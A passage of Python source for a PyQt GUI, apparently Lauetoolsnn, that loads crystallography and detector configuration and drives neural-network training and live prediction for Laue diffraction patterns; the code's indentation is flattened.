elif symmetry1_global == "tetragonal":
material1_lauegroup = "5"
elif symmetry1_global == "trigonal":
material1_lauegroup = "7"
elif symmetry1_global == "triclinic":
material1_lauegroup = "1"
except:
material1_lauegroup = "11"
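# The same symmetry -> Laue-group mapping written as a dict (sketch only, not
# used by the GUI; keys follow the symmetry strings handled above):
# {"cubic": "11", "monoclinic": "2", "hexagonal": "9", "orthorhombic": "3",
#  "tetragonal": "5", "trigonal": "7", "triclinic": "1"}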
if cpu_count_user == -1:
cpu_count_user = cpu_count()
GUI_START_TIME = time.time() #in ms
ACCEPTABLE_FORMATS = [".npz"]
gui_state = np.random.randint(1e6)
#%% Main module
class Window(QMainWindow):
"""Main Window."""
def __init__(self, winx=None, winy=None):
"""Initializer."""
super(Window, self).__init__()
# QMainWindow.__init__(self)
app_icon = QtGui.QIcon()
app_icon.addFile(Logo, QtCore.QSize(16,16))
self.setWindowIcon(app_icon)
if winx==None or winy==None:
self.setFixedSize(16777215,16777215)
else:
self.setFixedSize(winx, winy)
self.setWindowTitle("Laue Neural-Network v3")
self._createMenu()
self._createToolBar()
self._createStatusBar()
## init variables
self.input_params = {}
self.factor = 5 ## fixed for 20% validation dataset generation
self.state = 0
self.state1 = 0
self.state2 = 0
self.model = None
self.mode_spotCycleglobal = mode_spotCycle
self.softmax_threshold_global = softmax_threshold_global
self.mr_threshold_global = mr_threshold_global
self.cap_matchrate = cap_matchrate
self.coeff = coeff
self.coeff_overlap = coeff_overlap1212
self.fit_peaks_gaussian_global = fit_peaks_gaussian_global
self.FitPixelDev_global = FitPixelDev_global
self.NumberMaxofFits = NumberMaxofFits
self.tolerance_strain = tolerance_strain
self.tolerance_strain1 = tolerance_strain1
self.misorientation_angle = misorientation_angle1
self.material0_limit = material0_limit1212
self.material1_limit = material1_limit1212
self.material_phase_always_present = None
self.matrix_phase_always_present = None
self.generate_additional_data=False
self.use_previous_UBmatrix = use_previous_UBmatrix
self.crystal = None
self.SG = None
self.general_diff_rules = False
self.crystal1 = None
self.SG1 = None
self.general_diff_rules1 = False
self.strain_free_parameters = strain_free_parameters
self.additional_expression = additional_expression
# Add box layout, add table to box layout and add box layout to widget
self.layout = QVBoxLayout()
self._centralWidget = QWidget(self)
self.setCentralWidget(self._centralWidget)
self._centralWidget.setLayout(self.layout)
self._createDisplay() ## display screen
self.setDisplayText("Lauetoolsnn v"+ str(version_package))
self.setDisplayText(frame_title)
self.setDisplayText("Uses base libraries of LaueTools (micha@esrf.fr) to simulate Laue patterns for a given detector geometry \nFollows convention of BM32 beamline at ESRF")
self.setDisplayText("Polefigure and IPF plot modules are taken and modified from PYMICRO repository; HKL multiplicity and conditions are taken from xrayutilities library")
self.setDisplayText("This version supports multiprocessing \nGUI initialized! \nLog will be printed here \nPlease Train a model first, if not already done.\n")
self.setDisplayText("New materials and extinction rules can be set in LaueTools DictLP file before launching this module")
self.setDisplayText("For now the Learning rate of optimizer, Kernel and Bias weight Initializers are already optimized and set in the in-built model (can also be set to different values in the config window)"+\
" (TO find another set of parameters please use Hyper parameter optimization routine in GUI)")
self.setDisplayText("Load a config file first (for example see the example_config tab)")
self._formLayout() ## buttons and layout
self.popups = []
# self.showMaximized()
self.setFixedSize(16777215,16777215)
config_setting = configparser.ConfigParser()
filepath = resource_path('settings.ini')
config_setting.read(filepath)
config_setting.set('CALLER', 'residues_threshold',str(0.5))
config_setting.set('CALLER', 'nb_spots_global_threshold',str(8))
config_setting.set('CALLER', 'option_global',"v2")
config_setting.set('CALLER', 'use_om_user',"false")
config_setting.set('CALLER', 'nb_spots_consider',str(500))
config_setting.set('CALLER', 'path_user_OM',"none")
config_setting.set('CALLER', 'intensity', str(200))
config_setting.set('CALLER', 'boxsize', str(15))
config_setting.set('CALLER', 'pixdev', str(15))
config_setting.set('CALLER', 'cap_softmax', str(0.85))
config_setting.set('CALLER', 'cap_mr', str(0.01))
config_setting.set('CALLER', 'strain_free_parameters', ",".join(strain_free_parameters))
config_setting.set('CALLER', 'additional_expression', ",".join(additional_expression))
with open(filepath, 'w') as configfile:
config_setting.write(configfile)
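# Note: these CALLER entries are only startup defaults; load_config_from_file
# rewrites the same settings.ini keys from the user's config whenever a config
# file is loaded through the Menu.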
def closeEvent(self, event):
try:
self.text_file_log.close()
except:
print("Nothing to close")
self.close
QApplication.closeAllWindows()
super().closeEvent(event)
def _createDisplay(self):
"""Create the display."""
self.display = QTextEdit()
self.display.setReadOnly(True)
self.layout.addWidget(self.display)
def setDisplayText(self, text):
self.display.append('%s'%text)
self.display.moveCursor(QtGui.QTextCursor.End)
self.display.setFocus()
def _createMenu(self):
self.menu = self.menuBar().addMenu("&Menu")
self.menu.addAction('&Load Config', self.getfileConfig)
self.menu.addAction('&Exit', self.close)
def getfileConfig(self):
filenameConfig = QFileDialog.getOpenFileName(self, 'Select the config text file',
resource_path("examples"))
self.load_config_from_file(filenameConfig[0])
def load_config_from_file(self, configFile):
global material_global, symmetry_global, material1_global, symmetry1_global
global prefix_global, main_directory, emin_global, emax_global, ccd_label_global
global detectorparameters_global, pixelsize_global, dim1_global, dim2_global
global UB_matrix_global, image_grid_globalx , image_grid_globaly
global intensity_threshold_global, boxsize_global, fit_peaks_gaussian_global, FitPixelDev_global
global strain_label_global, tolerance_strain, tolerance_strain1, hkls_list_global
global expfile_global, exp_prefix_global, modelfile_global, weightfile_global
global hkl_max_global, elements_global, freq_rmv_global, hkl_max1_global
global elements1_global, freq_rmv1_global, maximum_angle_to_search_global
global step_for_binning_global, nb_grains_per_lp_global, nb_grains_per_lp1_global
global grains_nb_simulate_global, include_scm_global, batch_size_global, epochs_global
global tolerance_global, model_weight_file, material0_limit1212, material1_limit1212, tolerance_global1
global softmax_threshold_global, mr_threshold_global, cap_matchrate, coeff, cpu_count_user
global coeff_overlap1212, mode_spotCycle, NumberMaxofFits, use_previous_UBmatrix
global write_mtex_file, material0_lauegroup, material1_lauegroup, misorientation_angle1
config = configparser.ConfigParser()
try:
config.read_file(open(configFile))
except:
self.write_to_console("File not selected, nothing to open")
return
material_global = config.get('MATERIAL', 'material')
symmetry_global = config.get('MATERIAL', 'symmetry')
try:
self.SG = int(config.get('MATERIAL', 'space_group'))
except:
if symmetry_global =="cubic":
self.SG = 230
elif symmetry_global =="monoclinic":
self.SG = 10
elif symmetry_global == "hexagonal":
self.SG = 191
elif symmetry_global == "orthorhombic":
self.SG = 47
elif symmetry_global == "tetragonal":
self.SG = 123
elif symmetry_global == "trigonal":
self.SG = 162
elif symmetry_global == "triclinic":
self.SG = 2
self.write_to_console("Space group is not defined, by default taking the higher order for the specified symmetry")
try:
self.general_diff_rules = config.get('MATERIAL', 'general_diffraction_rules') == "true"
except:
self.general_diff_rules = False
self.write_to_console("general_diffraction_rules is not defined, by default False")
try:
cpu_count_user = int(config.get('CPU', 'n_cpu'))
if cpu_count_user <= 0 or cpu_count_user > cpu_count():
cpu_count_user = cpu_count()
except:
cpu_count_user = cpu_count()
try:
material1_global = config.get('MATERIAL', 'material1')
symmetry1_global = config.get('MATERIAL', 'symmetry1')
try:
self.SG1 = int(config.get('MATERIAL', 'space_group1'))
except:
if symmetry1_global =="cubic":
self.SG1 = 230
elif symmetry1_global =="monoclinic":
self.SG1 = 10
elif symmetry1_global == "hexagonal":
self.SG1 = 191
elif symmetry1_global == "orthorhombic":
self.SG1 = 47
elif symmetry1_global == "tetragonal":
self.SG1 = 123
elif symmetry1_global == "trigonal":
self.SG1 = 162
elif symmetry1_global == "triclinic":
self.SG1 = 2
self.write_to_console("Space group 1 is not defined, by default taking the higher order for the specified symmetry")
try:
self.general_diff_rules1 = config.get('MATERIAL', 'general_diffraction_rules1') == "true"
except:
self.general_diff_rules1 = False
self.write_to_console("general_diffraction_rules1 is not defined, by default False")
except:
material1_global = "none"
symmetry1_global = "none"
self.SG1 = "none"
self.general_diff_rules1 = False
self.write_to_console("Only one material is defined, by default taking the other one as 'none'")
if material1_global == "none" and symmetry1_global =="none":
material1_global = material_global
symmetry1_global = symmetry_global
prefix_global = str(config.get('GLOBAL_DIRECTORY', 'prefix'))
main_directory = str(config.get('GLOBAL_DIRECTORY', 'main_directory'))
if main_directory == "default":
main_directory = resource_path("models", verbose=0)
detectorfile = config.get('DETECTOR', 'detectorfile')
if detectorfile == "ZnCuOCl":
detectorfile = resource_path("examples//ZnCUOCl//calib.det", verbose=0)
elif detectorfile == "GaN":
detectorfile = resource_path("examples//GaN_Si//calib.det", verbose=0)
elif detectorfile == "user_input":
detectorfile2 = config.get('DETECTOR', 'params').split(",")
detectorparameters_global = [float(elem) for elem in detectorfile2[:5]]
pixelsize_global = float(detectorfile2[5])
dim1_global = float(detectorfile2[6])
dim2_global = float(detectorfile2[7])
ccd_label_global = detectorfile2[8]
try:
emax_global = float(config.get('DETECTOR', 'emax'))
emin_global = float(config.get('DETECTOR', 'emin'))
except:
self.write_to_console("Detector energy range not defined, using default values of 5-23KeV")
if detectorfile != "user_input":
try:
_file = open(detectorfile, "r")
text = _file.readlines()
_file.close()
# first line contains parameters
parameters = [float(elem) for elem in str(text[0]).split(",")]
detectorparameters_global = parameters[:5]
pixelsize_global = parameters[5]
dim1_global = parameters[6]
dim2_global = parameters[7]
# others are comments
comments = text[1:]
ccd_label_global = ""
for line in comments:
if line.startswith("# CCDLabel"):
ccd_label_global = line.split(":")[1].strip()
if ccd_label_global == "":
self.write_to_console("CCD label cannot be read from the calibration file, setting it to latest detector sCMOS")
ccd_label_global = "sCMOS"
except IOError as error:
self.write_to_console("Error opening file\n" + str(error))
except UnicodeDecodeError as error:
self.write_to_console("Error opening file\n" + str(error))
except:
self.write_to_console("Error opening file\n")
try:
UB_matrix_global = int(config.get('PREDICTION', 'UB_matrix_to_detect'))
except:
self.write_to_console("UB matrix to identify not defined, can be set in the Prediction window")
try:
image_grid_globalx = int(config.get('EXPERIMENT', 'image_grid_x'))
image_grid_globaly = int(config.get('EXPERIMENT', 'image_grid_y'))
except:
self.write_to_console("Scan grid not defined, can be set in the Prediction window")
try:
softmax_threshold_global = float(config.get('PREDICTION', 'softmax_threshold_global'))
except:
self.write_to_console("Softmax threshold not defined, using default 80%")
self.softmax_threshold_global = softmax_threshold_global
try:
mr_threshold_global = float(config.get('PREDICTION', 'mr_threshold_global'))
except:
self.write_to_console("Matching rate threshold not defined, using default 95%")
self.mr_threshold_global = mr_threshold_global
try:
coeff = float(config.get('PREDICTION', 'coeff'))
except:
self.write_to_console("Coeff Overlap v0 not defined, using default 10%")
self.coeff=coeff
try:
coeff_overlap1212 = float(config.get('PREDICTION', 'coeff_overlap'))
except:
self.write_to_console("Coeff Overlap not defined, using default 10%")
self.coeff_overlap=coeff_overlap1212
try:
mode_spotCycle = str(config.get('PREDICTION', 'mode_spotCycle'))
except:
self.write_to_console("Analysis mode not defined, using default graphmode, can be set in Prediction window")
self.mode_spotCycleglobal = mode_spotCycle
try:
material0_limit1212 = int(config.get('PREDICTION', 'material0_limit'))
except:
self.write_to_console("Max Nb of UB per material 0 not defined, using default maximum")
self.material0_limit = material0_limit1212
try:
material1_limit1212 = int(config.get('PREDICTION', 'material1_limit'))
except:
self.write_to_console("Max Nb of UB per material 1 not defined, using default maximum")
self.material1_limit = material1_limit1212
intensity_threshold_global = float(config.get('PEAKSEARCH', 'intensity_threshold'))
boxsize_global = int(config.get('PEAKSEARCH', 'boxsize'))
try:
fit_peaks_gaussian_global = int(config.get('PEAKSEARCH', 'fit_peaks_gaussian'))
except:
self.write_to_console("Fitting of peaks not defined, using default Gaussian fitting")
self.fit_peaks_gaussian_global = fit_peaks_gaussian_global
try:
FitPixelDev_global = float(config.get('PEAKSEARCH', 'FitPixelDev'))
except:
self.write_to_console("Fitting PixelDev of peaks not defined, using default 15 pix")
self.FitPixelDev_global=FitPixelDev_global
try:
NumberMaxofFits = float(config.get('PEAKSEARCH', 'NumberMaxofFits'))
except:
self.write_to_console("Max fits per LP not defined, using default 3000")
self.NumberMaxofFits=NumberMaxofFits
try:
strain_label_global = config.get('STRAINCALCULATION', 'strain_compute') == "true"
if strain_label_global:
strain_label_global = "YES"
else:
strain_label_global = "NO"
except:
strain_label_global = "NO"
self.write_to_console("Strain computation not defined, default False")
try:
tolerance_strain_temp = config.get('STRAINCALCULATION', 'tolerance_strain_refinement').split(",")
tolerance_strain = [float(i) for i in tolerance_strain_temp]
except:
self.write_to_console("Strain tolerance material 0 not defined")
self.tolerance_strain = tolerance_strain
try:
tolerance_strain_temp1 = config.get('STRAINCALCULATION', 'tolerance_strain_refinement1').split(",")
tolerance_strain1 = [float(i) for i in tolerance_strain_temp1]
except:
self.write_to_console("Strain tolerance for material 1 not defined")
self.tolerance_strain1 = tolerance_strain1
try:
hkls_list_global = config.get('POSTPROCESS', 'hkls_subsets')
except:
self.write_to_console("HKL post processing not defined, currently not used")
expfile_global = config.get('EXPERIMENT', 'experiment_directory')
exp_prefix_global = config.get('EXPERIMENT', 'experiment_file_prefix')
if expfile_global == "ZnCuOCl":
expfile_global = resource_path("examples//ZnCUOCl", verbose=0)
elif expfile_global == "GaN":
expfile_global = resource_path("examples//GaN_Si", verbose=0)
if exp_prefix_global == "ZnCuOCl":
exp_prefix_global = "HS17O_1_C_"
elif exp_prefix_global == "GaN":
exp_prefix_global = "nw1_"
##exp directory
if material_global == material1_global:
fn = material_global + prefix_global
else:
fn = material_global + "_" + material1_global + prefix_global
try:
model_weight_file = config.get('PREDICTION', 'model_weight_file')
except:
model_weight_file = "none"
modelfile_global = main_directory + "//" + fn
if material_global == material1_global:
if model_weight_file == "none":
weightfile_global = modelfile_global + "//" + "model_" + material_global + ".h5"
else:
weightfile_global = model_weight_file
else:
if model_weight_file == "none":
weightfile_global = modelfile_global + "//" + "model_" + material_global + "_" + material1_global + ".h5"
else:
weightfile_global = model_weight_file
try:
freq_rmv_global = int(config.get('TRAINING', 'classes_with_frequency_to_remove'))
except:
self.write_to_console("Frequency removal for HKLs not defined, can be defined in the config window")
try:
elements_global = config.get('TRAINING', 'desired_classes_output')
except:
self.write_to_console("Elements for HKLs not defined, can be defined in the config window")
try:
hkl_max_global = config.get('TRAINING', 'max_HKL_index')
except:
self.write_to_console("Max HKLs not defined, can be defined in the config window")
try:
nb_grains_per_lp_global = int(config.get('TRAINING', 'max_nb_grains'))
except:
self.write_to_console("Nb. of grains per LP not defined, can be defined in the config window")
try:
freq_rmv1_global = int(config.get('TRAINING', 'classes_with_frequency_to_remove1'))
except:
self.write_to_console("Frequency removal for HKLs 1 not defined, can be defined in the config window")
try:
elements1_global = config.get('TRAINING', 'desired_classes_output1')
except:
self.write_to_console("Elements for HKLs 1 not defined, can be defined in the config window")
try:
hkl_max1_global = config.get('TRAINING', 'max_HKL_index1')
except:
self.write_to_console("Max HKLs 1 not defined, can be defined in the config window")
try:
nb_grains_per_lp1_global = int(config.get('TRAINING', 'max_nb_grains1'))
except:
self.write_to_console("Nb. of grains per LP 1 not defined, can be defined in the config window")
try:
maximum_angle_to_search_global = float(config.get('TRAINING', 'angular_distance'))
except:
self.write_to_console("Histogram angle not defined, can be defined in the config window")
try:
step_for_binning_global = float(config.get('TRAINING', 'step_size'))
except:
self.write_to_console("steps for histogram binnning not defined, can be defined in the config window")
try:
grains_nb_simulate_global = int(config.get('TRAINING', 'max_simulations'))
except:
self.write_to_console("Number of simulations per LP not defined, can be defined in the config window")
try:
include_scm_global = config.get('TRAINING', 'include_small_misorientation') == "true"
except:
self.write_to_console("Single crystal misorientation not defined, can be defined in the config window")
try:
misorientation_angle = float(config.get('TRAINING', 'misorientation_angle'))
except:
misorientation_angle = misorientation_angle1
self.write_to_console("Angle of Single crystal misorientation along Z not defined, can be defined in the config window")
self.misorientation_angle = misorientation_angle
try:
batch_size_global = int(config.get('TRAINING', 'batch_size'))
except:
self.write_to_console("Batch size not defined, can be defined in the config window")
try:
epochs_global = int(config.get('TRAINING', 'epochs'))
except:
self.write_to_console("Epochs not defined, can be defined in the config window")
try:
cap_matchrate = float(config.get('PREDICTION', 'cap_matchrate')) * 100
except:
self.write_to_console("Cap_Matching rate not defined, setting default value of 1%")
self.cap_matchrate=cap_matchrate
try:
tolerance_global = float(config.get('PREDICTION', 'matrix_tolerance'))
except:
self.write_to_console("Angle tolerance to detect grains not defined, using default 0.7")
try:
tolerance_global1 = float(config.get('PREDICTION', 'matrix_tolerance1'))
except:
self.write_to_console("Angle tolerance for Mat 1 to detect grains not defined, using default 0.7")
try:
use_previous_UBmatrix = config.get('PREDICTION', 'use_previous') == "true"
except:
self.write_to_console("Use previous solutions not defined, using default value False")
self.use_previous_UBmatrix = use_previous_UBmatrix
try:
material_phase_always_present = config.get('DEVELOPMENT', 'material_phase_always_present')
except:
material_phase_always_present = "none"
self.write_to_console("material_phase_always_present not defined, default is NONE")
if material_phase_always_present == "none":
material_phase_always_present = None
else:
material_phase_always_present = int(material_phase_always_present)
self.material_phase_always_present = material_phase_always_present
try:
matrix_phase_always_present = config.get('DEVELOPMENT', 'matrix_phase_always_present')
except:
matrix_phase_always_present = "none"
self.write_to_console("matrix_phase_always_present not defined, default is NONE")
if matrix_phase_always_present == "none":
matrix_phase_always_present = None
else:
matrix_phase_always_present = matrix_phase_always_present
self.matrix_phase_always_present = matrix_phase_always_present
try:
generate_additional_data = config.get('DEVELOPMENT', 'generate_additional_data')=='true'
except:
generate_additional_data = False
self.write_to_console("generate_additional_data not defined, default is False")
self.generate_additional_data = generate_additional_data
try:
write_mtex_file = config.get('DEVELOPMENT', 'write_MTEX_file') == "true"
except:
self.write_to_console("Write MTEX texture file not defined, by default True")
try:
if symmetry_global =="cubic":
material0_lauegroup = "11"
elif symmetry_global =="monoclinic":
material0_lauegroup = "2"
elif symmetry_global == "hexagonal":
material0_lauegroup = "9"
elif symmetry_global == "orthorhombic":
material0_lauegroup = "3"
elif symmetry_global == "tetragonal":
material0_lauegroup = "5"
elif symmetry_global == "trigonal":
material0_lauegroup = "7"
elif symmetry_global == "triclinic":
material0_lauegroup = "1"
except:
material0_lauegroup = "11"
try:
if symmetry1_global =="cubic":
material1_lauegroup = "11"
elif symmetry1_global =="monoclinic":
material1_lauegroup = "2"
elif symmetry1_global == "hexagonal":
material1_lauegroup = "9"
elif symmetry1_global == "orthorhombic":
material1_lauegroup = "3"
elif symmetry1_global == "tetragonal":
material1_lauegroup = "5"
elif symmetry1_global == "trigonal":
material1_lauegroup = "7"
elif symmetry1_global == "triclinic":
material1_lauegroup = "1"
except:
material1_lauegroup = "11"
##update config file for Neural network
try:
residues_threshold = config.get('CALLER', 'residues_threshold')
except:
self.write_to_console("residues_threshold not defined, by default 0.25")
residues_threshold = 0.25
try:
nb_spots_global_threshold = config.get('CALLER', 'nb_spots_global_threshold')
except:
self.write_to_console("nb_spots_global_threshold not defined, by default 8")
nb_spots_global_threshold = 8
try:
option_global = config.get('CALLER', 'option_global')
except:
self.write_to_console("option_global not defined, by default v2")
option_global = "v2"
try:
use_om_user_global = config.get('CALLER', 'use_om_user')
except:
self.write_to_console("use_om_user not defined, by default False")
use_om_user_global = "false"
try:
nb_spots_consider_global = int(config.get('CALLER', 'nb_spots_consider'))
except:
self.write_to_console("nb_spots_consider not defined, by default 500")
nb_spots_consider_global = 500
try:
path_user_OM_global = config.get('CALLER', 'path_user_OM')
except:
self.write_to_console("path_user_OM not defined, by default None")
path_user_OM_global = ""
try:
strain_free_parameters = config.get('STRAINCALCULATION', 'free_parameters').split(",")
except:
strain_free_parameters = ["rotx", "roty", "rotz", "alpha", "beta", "gamma", "b", "c"]
self.write_to_console("strain_free_parameters not defined; fixing only 'a' length by default")
self.strain_free_parameters = strain_free_parameters
try:
additional_expression = config.get('STRAINCALCULATION', 'additional_expression').split(",")
except:
additional_expression = ["none"]
self.write_to_console("additional_expression not defined; none by default")
self.additional_expression = additional_expression
config_setting = configparser.ConfigParser()
filepath = resource_path('settings.ini')
self.write_to_console("Settings path is "+filepath)
config_setting.read(filepath)
config_setting.set('CALLER', 'residues_threshold',str(residues_threshold))
config_setting.set('CALLER', 'nb_spots_global_threshold',str(nb_spots_global_threshold))
config_setting.set('CALLER', 'option_global',str(option_global))
config_setting.set('CALLER', 'use_om_user',str(use_om_user_global))
config_setting.set('CALLER', 'nb_spots_consider',str(nb_spots_consider_global))
config_setting.set('CALLER', 'path_user_OM',str(path_user_OM_global))
config_setting.set('CALLER', 'intensity', str(intensity_threshold_global))
config_setting.set('CALLER', 'boxsize', str(boxsize_global))
config_setting.set('CALLER', 'pixdev', str(FitPixelDev_global))
config_setting.set('CALLER', 'cap_softmax', str(softmax_threshold_global))
config_setting.set('CALLER', 'cap_mr', str(cap_matchrate/100.))
config_setting.set('CALLER', 'strain_free_parameters', ",".join(strain_free_parameters))
config_setting.set('CALLER', 'additional_expression', ",".join(additional_expression))
with open(filepath, 'w') as configfile:
config_setting.write(configfile)
self.write_to_console("Config file loaded successfully.")
# except:
# self.write_to_console("Config file Error.")
def _createToolBar(self):
self.tools = QToolBar()
self.addToolBar(self.tools)
self.trialtoolbar101 = self.tools.addAction('Example_config', self.show_window_config)
self.trialtoolbar10 = self.tools.addAction('Re-Train saved model', self.show_window_retraining_fromfile)
self.trialtoolbar1 = self.tools.addAction('Re-Train GUI model', self.show_window_retraining)
self.trialtoolbar10.setEnabled(False)
self.trialtoolbar1.setEnabled(False)
def show_window_parameters(self):
w2 = AnotherWindowParams(self.state, gui_state)
w2.got_signal.connect(self.postprocesstrain)
w2.show()
self.popups.append(w2)
self.state = self.state +1
def show_window_retraining(self):
ct = time.time()
now = datetime.datetime.fromtimestamp(ct)
c_time = now.strftime("%Y-%m-%d_%H-%M-%S")
self.train_model(prefix="_"+c_time, tag = 1)
def show_window_retraining_fromfile(self):
ct = time.time()
now = datetime.datetime.fromtimestamp(ct)
c_time = now.strftime("%Y-%m-%d_%H-%M-%S")
self.train_model(prefix="_"+c_time, tag = 2)
def show_window_config(self):
w21 = sample_config()
w21.show()
self.popups.append(w21)
def show_window_liveprediction(self):
try:
if self.material_ != self.material1_:
with open(self.save_directory+"//classhkl_data_nonpickled_"+self.material_+".pickle", "rb") as input_file:
hkl_all_class0 = cPickle.load(input_file)[0]
with open(self.save_directory+"//classhkl_data_nonpickled_"+self.material1_+".pickle", "rb") as input_file:
hkl_all_class1 = cPickle.load(input_file)[0]
else:
hkl_all_class1 = None
with open(self.save_directory+"//classhkl_data_nonpickled_"+self.material_+".pickle", "rb") as input_file:
hkl_all_class0 = cPickle.load(input_file)[0]
except:
if self.material_ != self.material1_:
with open(self.save_directory+"//classhkl_data_"+self.material_+".pickle", "rb") as input_file:
_, _, _, _, _, hkl_all_class0, _, _, symmetry = cPickle.load(input_file)
with open(self.save_directory+"//classhkl_data_"+self.material1_+".pickle", "rb") as input_file:
_, _, _, _, _, hkl_all_class1, _, _, _ = cPickle.load(input_file)
else:
hkl_all_class1 = None
with open(self.save_directory+"//classhkl_data_"+self.material_+".pickle", "rb") as input_file:
_, _, _, _, _, hkl_all_class0, _, _, _ = cPickle.load(input_file)
w2 = AnotherWindowLivePrediction(self.state2, gui_state,
material_=self.material_, material1_=self.material1_, emin=self.emin,
emax=self.emax, symmetry=self.symmetry, symmetry1=self.symmetry1,
detectorparameters=self.detectorparameters, pixelsize=self.pixelsize,
lattice_=self.lattice_material, lattice1_ =self.lattice_material1,
hkl_all_class0 = hkl_all_class0, hkl_all_class1=hkl_all_class1,
mode_spotCycleglobal=self.mode_spotCycleglobal,
softmax_threshold_global = self.softmax_threshold_global,
mr_threshold_global = self.mr_threshold_global,
cap_matchrate = self.cap_matchrate,
coeff = self.coeff,
coeff_overlap1212 = self.coeff_overlap,
fit_peaks_gaussian_global = self.fit_peaks_gaussian_global,
FitPixelDev_global = self.FitPixelDev_global,
NumberMaxofFits = self.NumberMaxofFits,
tolerance_strain = self.tolerance_strain,
tolerance_strain1 = self.tolerance_strain1,
material0_limit = self.material0_limit,
material1_limit = self.material1_limit,
symmetry_name = self.symmetry_name,
symmetry1_name = self.symmetry1_name,
use_previous_UBmatrix_name = self.use_previous_UBmatrix,
material_phase_always_present = self.material_phase_always_present,
crystal=self.crystal, crystal1=self.crystal1,
strain_free_parameters=self.strain_free_parameters,
additional_expression=self.additional_expression)
w2.show()
self.popups.append(w2)
self.state2 += 1
def _createStatusBar(self):
self.status = QStatusBar()
self.status.showMessage("status")
self.setStatusBar(self.status)
def _formLayout(self):
self.formLayout = QFormLayout()
self.progress = QProgressBar()
self.configure_nn = QPushButton('Configure parameters')
self.configure_nn.clicked.connect(self.show_window_parameters)
self.configure_nn.setEnabled(True)
self.generate_nn = QPushButton('Generate Training dataset')
self.generate_nn.clicked.connect(self.generate_training_data)
self.generate_nn.setEnabled(False)
self.train_nn = QPushButton('Train Neural Network')
self.train_nn.clicked.connect(self.train_neural_network)
self.train_nn.setEnabled(False)
self.train_nnhp = QPushButton('Hypergrid Params OPT')
self.train_nnhp.clicked.connect(self.grid_search_hyperparams)
self.train_nnhp.setEnabled(False)
self.predict_lnn = QPushButton('Live Prediction with IPF map')
self.predict_lnn.clicked.connect(self.show_window_liveprediction)
self.predict_lnn.setEnabled(False)
self.formLayout.addRow(self.progress)
self.formLayout.addRow(self.configure_nn)
self.formLayout.addRow(self.generate_nn)
self.formLayout.addRow(self.train_nn)
self.formLayout.addRow(self.train_nnhp)
self.formLayout.addRow(self.predict_lnn)
self.layout.addLayout(self.formLayout)
def write_to_console(self, line):
try:
self.text_file_log.write(line + "\n")
except:
print("Log file not yet created: "+ str(line.encode('utf-8','ignore')))
self.setDisplayText(str(line.encode('utf-8','ignore'),errors='ignore'))
QApplication.processEvents()
def postprocesstrain(self, emit_dict):
self.input_params = {
"material_": emit_dict["material_"], ## same key as used in LaueTools
"material1_": emit_dict["material1_"],
"prefix": emit_dict["prefix"],
"symmetry": emit_dict["symmetry"],
"symmetry1": emit_dict["symmetry1"],
"hkl_max_identify" : emit_dict["hkl_max_identify"], # can be "auto" or an index i.e 12
"hkl_max_identify1" : emit_dict["hkl_max_identify1"],
"maximum_angle_to_search" : emit_dict["maximum_angle_to_search"],
"step_for_binning" : emit_dict["step_for_binning"],
"mode_of_analysis" : emit_dict["mode_of_analysis"],
"nb_grains_per_lp" : emit_dict["nb_grains_per_lp"], ## max grains to expect in a LP
"nb_grains_per_lp1" : emit_dict["nb_grains_per_lp1"],
"grains_nb_simulate" : emit_dict["grains_nb_simulate"],
"detectorparameters" : emit_dict["detectorparameters"],
"pixelsize" : emit_dict["pixelsize"],
"dim1" : emit_dict["dim1"],
"dim2" : emit_dict["dim2"],
"emin" : emit_dict["emin"],
"emax" : emit_dict["emax"],
"batch_size" : emit_dict["batch_size"], ## batches of files to use while training
"epochs" : emit_dict["epochs"], ## number of epochs for training
"texture": emit_dict["texture"],
"mode_nn": emit_dict["mode_nn"],
"grid_bool": emit_dict["grid_bool"],
"directory": emit_dict["directory"],
"freq_rmv": emit_dict["freq_rmv"],
"elements": emit_dict["elements"],
"freq_rmv1": emit_dict["freq_rmv1"],
"elements1": emit_dict["elements1"],
"include_scm": emit_dict["include_scm"],
"lr": emit_dict["lr"],
"kc": emit_dict["kc"],
"bc": emit_dict["bc"],
}
## Gray out options based on the mode_nn
if self.input_params["mode_nn"] == "Generate Data & Train":
self.write_to_console("Generate and Train the Model")
self.generate_nn.setEnabled(True)
elif self.input_params["mode_nn"] == "Train":
self.write_to_console("Data already exists ? Train the Model")
self.train_nn.setEnabled(True)
self.trialtoolbar10.setEnabled(True)
elif self.input_params["mode_nn"] == "Predict":
self.write_to_console("Model already exists? Lets Predict!")
self.write_to_console("on the fly prediction (fingers crossed)")
# self.predict_nn.setEnabled(True)
# self.predict_nnc.setEnabled(True)
self.predict_lnn.setEnabled(True)
if self.input_params["grid_bool"] == "True":
self.train_nnhp.setEnabled(True)
self.include_scm = False
if self.input_params["include_scm"] == "yes":
self.include_scm = True
self.freq_rmv = self.input_params["freq_rmv"]
self.freq_rmv1 = self.input_params["freq_rmv1"]
if self.input_params["elements"] == "all":
self.elements = self.input_params["elements"] #"all"
self.elements1 = self.input_params["elements1"] #"all"
else:
self.elements = int(self.input_params["elements"])
self.elements1 = int(self.input_params["elements1"])
self.material_ = self.input_params["material_"]
self.material1_ = self.input_params["material1_"]
self.emin, self.emax = self.input_params["emin"], self.input_params["emax"]
self.learning_rate, self.kernel_coeff, self.bias_coeff = self.input_params["lr"],self.input_params["kc"],self.input_params["bc"]
if self.input_params["directory"] == None: ## default path
if self.material_ == self.material1_:
self.save_directory = os.getcwd()+"//"+self.input_params["material_"]+self.input_params["prefix"]
else:
self.save_directory = os.getcwd()+"//"+self.input_params["material_"]+"_"+self.input_params["material1_"]+self.input_params["prefix"]
else:
if self.material_ == self.material1_:
self.save_directory = self.input_params["directory"]+"//"+self.input_params["material_"]+self.input_params["prefix"]
else:
self.save_directory = self.input_params["directory"]+"//"+self.input_params["material_"]+"_"+self.input_params["material1_"]+self.input_params["prefix"]
self.n = self.input_params["hkl_max_identify"]
self.n1 = self.input_params["hkl_max_identify1"]
self.maximum_angle_to_search = self.input_params["maximum_angle_to_search"]
self.step_for_binning = self.input_params["step_for_binning"]
self.mode_of_analysis = self.input_params["mode_of_analysis"]
self.nb_grains_per_lp = self.input_params["nb_grains_per_lp"]
self.nb_grains_per_lp1 = self.input_params["nb_grains_per_lp1"]
self.grains_nb_simulate = self.input_params["grains_nb_simulate"]
self.detectorparameters = self.input_params["detectorparameters"]
self.pixelsize = self.input_params["pixelsize"]
# =============================================================================
# Symmetry input
# =============================================================================
a, b, c, alpha, beta, gamma = dictLT.dict_Materials[self.material_][1]
# a, b, c = a*0.1, b*0.1, c*0.1
if self.SG == None:
if self.input_params["symmetry"] =="cubic":
self.SG = 230
elif self.input_params["symmetry"] =="monoclinic":
self.SG = 10
